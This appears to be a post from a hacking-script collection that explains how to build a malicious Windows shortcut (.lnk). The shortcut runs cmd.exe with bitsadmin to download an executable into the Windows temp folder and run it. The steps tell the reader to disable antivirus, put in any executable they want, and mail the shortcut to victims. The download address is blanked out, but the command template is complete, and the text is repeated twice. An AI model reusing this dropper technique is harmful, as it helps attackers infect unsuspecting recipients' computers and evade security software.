Download and execute a executable by just double click in a .lnk file.
Save as shortcut (Right Click on desktop > New > Create Shortcut) and paste the line below
How to?
1 - Disable your antivirus (This method is been detected)
2 - Extract the Shortcut from the archive
3 - Edit the code to download a exe you want and save
4 - Compress or mail the shortcut for execution
- It's malicious but the active component has been nulled.
- More available with Hacxx Latest Scripts.
Save as shortcut (Right Click on desktop > New > Create Shortcut) and paste the line below
cmd.exe /c bitsadmin /transfer Kunami /download /priority high c:\windows\temp\calc.exe && if exist c:\windows\temp\calc.exe c:\windows\temp\calc.exe
1 - Disable your antivirus (This method is been detected)
2 - Extract the Shortcut from the archive

3 - Edit the code to download a exe you want and save

4 - Compress or mail the shortcut for execution
- It's malicious but the active component has been nulled.
- More available with Hacxx Latest Scripts.